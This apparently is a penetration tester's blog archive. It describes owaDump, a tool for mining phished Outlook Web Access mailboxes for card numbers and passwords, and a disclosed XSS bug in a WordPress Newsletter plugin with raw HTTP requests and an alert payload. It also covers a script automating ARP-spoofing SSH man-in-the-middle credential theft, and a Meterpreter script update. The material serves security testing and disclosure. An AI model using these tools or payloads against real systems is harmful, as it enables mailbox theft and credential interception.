Archive for the ‘Uncategorized’ Category

owaDump – Another tool to use during Phishing Campaigns

October 20, 2016 Leave a comment

There were a number of tools available in the Internet for attacking Exchange/Outlook Web Access.

Below are some of them that I have used before.
1) OWA-Toolkit (
2) Metasploit Outlook Web Access (OWA) Bruteforce Utility (
3) OWABF (,26944)
4) PEAS (
5) MailSniper (

During a phishing test, other than attempting to gain further access to the target’s network via HTA powershell, exploiting out-of-date browser plugins and etc, another interesting thing to look at are targets’ email accounts.

If we have captured more than 50 to 100 credentials via the phishing test, it might not be feasible to ransack the mailboxes one at a time manually.

I needed a simple tool (that I can write in a couple of hours) to search the mailboxes of users for PAN (VISA and MasterCard) numbers, passwords or even specific keywords.

As there were tons of resources on the Internet regarding Exchange Web Services (EWS) for C#, I decided to write the tool in C# instead of the usual Python/Ruby and use mono to run the executable on OSX and Linux. I have tested this on OSX and Win32.

Mono can be downloaded from

It should work on all versions of OWA.
Please let me know if you face any issues.

$ mono owaDump.exe -h
-u, –user       Required. Email Address
-p, –pass       Required. Password
-f, –file       Text File (Email|Password) Per Line
-k, –keyword    Text to Search
–pan            (Default: False) Find PAN numbers
-d               (Default: False) Debug Mode
-h, –help       (Default: False) Print This Help Menu

Below are some ways you can use the tool.
In the below example, keywords such as password, creds, credentials, ssn, credit card are used as search terms.

$ mono owaDump.exe -u -p ‘Password’

[Subject]: RE [WARNING :  Test Mail]

If you check the current folder, you will see the below files.
Emails and attachments that we found to be matching the search terms were downloaded.

$ ls

If you would like to search for PAN numbers, you can use the –pan keyword.

$ mono owaDump.exe -u -p ‘Password’ –pan
[PAN] PAN Number found in keith_Inbox3.eml

If you have a list of email addresses and passwords which you captured from a phishing test or a dump from the Domain Controller, you can use the below.

Below is the format of the text file if you want to target multiple accounts.

$ cat creds.txt|password1|password2

$ mono owaDump.exe -f creds.txt
[Subject]: RE [WARNING :  Test Mail]

[Subject]: RE [WARNING :  Test Mail]

The source code is available for download at

If you needed a compiled version of the executable, it is available at


This is a pre-release.  Please send me your comments and suggestions.
Thank you for reading.


XSS issue in WordPress Plugin: Newsletter Version 4.6.0

October 13, 2016 Leave a comment
I recently reported a Cross-Site Scripting (XSS), Reflected issue for WordPress Plugin: Newsletter 4.6.0 to


The developers have since released a patch for the plugin (version 4.6.1) (see for more information).

1. Stored Cross-Site Scripting (XSS)
Authenticated administrators can inject html/js code (there is no CSRF protection).
Method: POST
Vulnerable Parameter(s): 
Example Attack:
POST /wordpress/wp-admin/admin.php?page=newsletter_subscription_lists HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:48.0) Gecko/20100101 Firefox/48.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1762
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:12 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 102536
GET /wordpress/wp-admin/admin.php?page=newsletter_users_massive HTTP/1.1
Host: localhost:8888
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
HTTP/1.1 200 OK
Date: Wed, 28 Sep 2016 17:40:37 GMT
Server: Apache
X-Powered-By: PHP/7.0.10
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Frame-Options: SAMEORIGIN
X-UA-Compatible: IE=edge
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 98989
For preference <select id=”options-list” name=”options[list]”><option value=”1″>(1) test</option><option value=”2″>(2) </option><option value=”3″>(3) </option><option value=”4″>(4) </option><option value=”5″>(5) </option><option value=”6″>(6) </option><option value=”7″>(7) bi1x5alert(‘xss’)gjoce</option><option value=”8″>(8)
Categories: Uncategorized

Automating Man-in-the-Middle SSHv2 attacks

November 12, 2014 3 comments

Recently during an internal penetration test, I was performing ARP spoofing and i discovered a SSH connection from the administrator computer to another box.

That sounds like the correct way to access remote hosts securely. However, the problem was that the company was using a network switch that was vulnerable to ARP spoofing.

I came across the below article about performing ARP spoofing and MITM SSH connections to steal credentials.

When performing arp spoofing and performing a mitm attack on SSH, the victim does get an alert message saying that there is a key mismatch but most people just ignore them anyway.

Below is the link to the original article.

In the article, the author demonstrates the use of a software called JMITM2 ( which is sort of like a honey pot that proxies SSH connections between the victim and the target SSH server.

However, there are a number of steps to be done manually to execute this attack during an internal penetration test.

1. Check if network is vulnerable to ARP spoofing
2. Check if there are any active SSH connections in the network
2. Identify the victim computer and SSH server
3. Modify the configuration files of JMITM2
4. Modifying iptables
5. ARP spoofing
6. Checking JMITM2 console for credentials
7. Re-arp the router and victim host with the correct MAC addresses of each.

It would save a great amount of time to automate these steps. I wrote a script that does just that.

Running the command below checks the network for active SSH connections (via ARP spoofing) and then automates the whole attack to outputs any credentials captured to the console.

python2.7 -analyze

If you know the victim host IP and SSH server, you can use the below command

python2.7 -host victims -ssh sshServerIP

This script has only been tested on Kali Linux.

There are a couple of things that are still in the works to improve the script.
1. Switching from intercepter-ng for ARP spoofing to scapy.

The script can be grabbed from the below link

Categories: Uncategorized Tags: , ,

Command Line IMAP/POP3 Email Downloader

July 30, 2013 Leave a comment

Wrote this script “Command Line IMAP/POP3 Email Downloader” some time ago.
Found it during spring cleaning.

Download the script here

Categories: Uncategorized

Meterpreter Script for Prefetch-Tool (updated)

October 25, 2009 Leave a comment

The prefetch tool has been updated.   Spend the Sunday making the changes.  I hope you guys like it.

Changes include:
1. prefetch.exe executable has been reduced from 3.8mb to 2.2mb.  Any size smaller than this, I will have to rewrite the code in c++.
2. Prefetch tool is much faster now due to some logic issues in the previous script.
3. Meterpreter script updated to download new prefetch.exe from my googlecode project’s site on demand when new updates are available.


The googlecode project site is available at

If you have any ideas or suggestions, hit me.

Categories: Uncategorized

September 21, 2009 Leave a comment

Check out the new issue of Hakin9

* Windows Timeline Analysis
* Analyzing Malware Introduction to Advanced Topics…
* Hacking ASLR & Stack Canaries on Modern Linux…
* Mashup Security…
* My ERP Got Hacked – An Introduction to Computer Forensics, Part II…
* First Password Shooters…
* RSA & AES in JAVA…
* AV Scanner 101…
* The Underworld of CVV Dumping…
* It’s All About Reputation…
* Interview with Andrey Belenko…
* DefenseWall Pure Policy-Based Sandbox Application…
* Interview with Alexandre Dulaunoy & Fred Arbogast…
And more ….

I like the article on Windows Timeline Analysis.  Even if you are not a forensic investigator, you will definitely learn something useful from this.  (:

Categories: Uncategorized